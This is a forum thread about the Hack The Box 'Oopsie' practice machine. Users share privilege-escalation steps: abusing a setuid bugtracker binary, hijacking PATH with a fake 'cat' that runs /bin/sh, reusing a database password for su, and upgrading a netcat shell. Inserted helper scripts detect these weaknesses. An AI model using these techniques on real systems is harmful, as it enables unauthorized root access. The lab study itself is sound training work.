Oopsie Machine - Starting Point

Right now bugtracker doesn’t have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn’t work.

robert@oopsie:/tmp$ /usr/bin/bugtracker

: EV Bug Tracker :

Provide Bug ID: 1

$ whoami
robert
$ ls -al /usr/bin/bugtracker
-rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

However bugtracker.save still has the setuid bit so that can work:
$ ls -al /usr/bin/bugtracker.save
-rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save
$ /usr/bin/bugtracker.save

: EV Bug Tracker :

Provide Bug ID: 1

whoami

root
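The listing above shows a setuid copy (bugtracker.save) left next to a binary that no longer has the bit. As an added example, not part of the original post, this shell function reports setuid files whose name is a sibling file's name plus a backup-style suffix; the function name and the suffix list are assumptions.

```shell
#!/bin/sh
# Added example (hypothetical helper): find setuid files that look like leftover
# copies of another file in the same directory, such as the
# bugtracker / bugtracker.save pair in the listing above.
# The suffix list is an assumption; extend it for your environment.

stray_setuid_copies() {
    dir=$1
    # -perm -4000 selects files with the setuid bit; -type f skips directories.
    find "$dir" -maxdepth 1 -type f -perm -4000 2>/dev/null |
    while IFS= read -r f; do
        for suffix in .save .bak .old .orig '~'; do
            case $f in
                *"$suffix")
                    base=${f%"$suffix"}
                    if [ -f "$base" ]; then
                        # The original exists: say whether it still has the bit.
                        if [ -u "$base" ]; then state="setuid too"; else state="not setuid"; fi
                        printf '%s\tcopy of %s (%s)\n' "$f" "$base" "$state"
                    else
                        printf '%s\tbackup-style name, original missing\n' "$f"
                    fi
                    ;;
            esac
        done
    done
}

# Constructed fixture mirroring the listing: a plain file and a setuid ".save" copy.
demo_dir=$(mktemp -d)
: > "$demo_dir/bugtracker";      chmod 0755 "$demo_dir/bugtracker"
: > "$demo_dir/bugtracker.save"; chmod 4755 "$demo_dir/bugtracker.save"
stray_setuid_copies "$demo_dir"
rm -rf "$demo_dir"
```

On a real host, point it at each directory that holds system binaries and treat every reported file as a candidate for removal or for clearing the setuid bit.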

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn’t turning anything up. You’ll find what you need if you keep looking.

@stevebytheway said:

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that running locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

I am in netcat and logged in as www-data
www-data@oopsie:
When I try to sudo robert I'm getting sorry try again?
I am using the password from the db.php file.
Am I missing something?

@ritorix How did you get into the robert user account? When I attempt su robert and enter the password from the db.php file, it gives me “su: Authentication failure”

Looks like someone may have changed the password? I tried the same process today and it worked!

@kp22cfc said:

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

@Jade86 said:
@kp22cfc said:

I am able to do that but when I do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

ah ok. got it, sorry lol

OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don’t have access to anything. i.e. /root. I’ve gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what is happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?

Someone helped me understand that Ctrl-Z is to send the nc connection to the background without killing it (this is where I was getting confused). Then the “fg” command brings it forward …

Hope this helps to users like me… :smile:

@deeptestpilot said:

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what is happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?

Did you find how to solve Terminal type? I’m stuck at that point

@deeptestpilot said:

Hi guys, need help… script below is not working for me.

this is what is happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z

Don’t copy and paste the block of code provided. After the SHELL command don’t type “Ctrl-Z”. Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm’s command line.

Then type the stty command. Enter.
Then type “fg” which will bring your shell cli back up. In the shell cli type “reset” and you will be asked what type of terminal to open. Type “xterm”. Voilà! I ran into this also

Thank you for the help… I was able to get both flags.

@KCPO said:

@deeptestpilot said:

Hi guys, need help… script below is not working for me.

this is what is happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z

Don’t copy and paste the block of code provided. After the SHELL command don’t type “Ctrl-Z”. Press the Ctrl and Z keypad buttons at the same time. This will throw you back to your attacker machine and put the shell in the background. So you should have your vm’s command line.

Then type the stty command. Enter.
Then type “fg” which will bring your shell cli back up. In the shell cli type “reset” and you will be asked what type of terminal to open. Type “xterm”. Voilà! I ran into this also

Hi everyone
what is filezilla.xml and how to use it?
i tried filezilla but it said no route to host!

@falsepromise said:

Hi everyone
what is filezilla.xml and how to use it?
i tried filezilla but it said no route to host!

Type: vim filezilla.xml
This should reveal the file to you.

hi guys, I was able to do almost everything but got stuck on this

robert@oopsie:/$ export PATH=/tmp:$PATH
robert@oopsie:/$ cd /tmp/
robert@oopsie:/tmp$ echo '/bin/sh' > cat
robert@oopsie:/tmp$ chmod +x cat
chmod: changing permissions of ‘cat’: Operation not permitted

I have tried different paths but nothing works, still working on it

can you please help me?

Nvm, solved.
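The PATH change in the post above only matters because a privileged program resolves a bare command name through a search path the caller controls. As an added example, not part of the original post, this shell function lists the PATH entries a privileged script or service should not rely on; the function name and the sample PATH value are assumptions.

```shell
#!/bin/sh
# Added example (hypothetical helper): flag PATH entries that let another user
# decide which binary a bare command name resolves to.
# Flagged: empty entries and relative entries (both resolve against the current
# directory) and directories writable by group or others, such as /tmp.

risky_path_entries() {
    rest=$1:                       # trailing ':' so the last entry is processed too
    while [ -n "$rest" ]; do
        entry=${rest%%:*}          # text before the first ':'
        rest=${rest#*:}            # drop that entry and its ':'
        case $entry in
            '') printf '(empty)\tempty entry means the current directory\n'; continue ;;
            /*) ;;                 # absolute path: check its permissions below
            *)  printf '%s\trelative entry\n' "$entry"; continue ;;
        esac
        # First ten characters of ls -l output are type plus rwx triplets;
        # -L follows symlinks such as /bin -> usr/bin.
        mode=$(ls -ldL "$entry" 2>/dev/null | cut -c1-10)
        case $mode in
            d????w*|d???????w*)    # 'w' in the group (6th) or other (9th) column
                printf '%s\twritable by group or others (%s)\n' "$entry" "$mode" ;;
        esac
    done
}

# Constructed sample value with a writable directory placed first, as in the post.
risky_path_entries "/tmp:/usr/bin:/bin"

# A privileged script avoids the problem by setting its own search path and
# calling helpers by absolute path, for example:
#   PATH=/usr/sbin:/usr/bin:/sbin:/bin; export PATH
#   /bin/cat "$report"
```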


Got the flags for myself too. Thank you everyone in this thread!!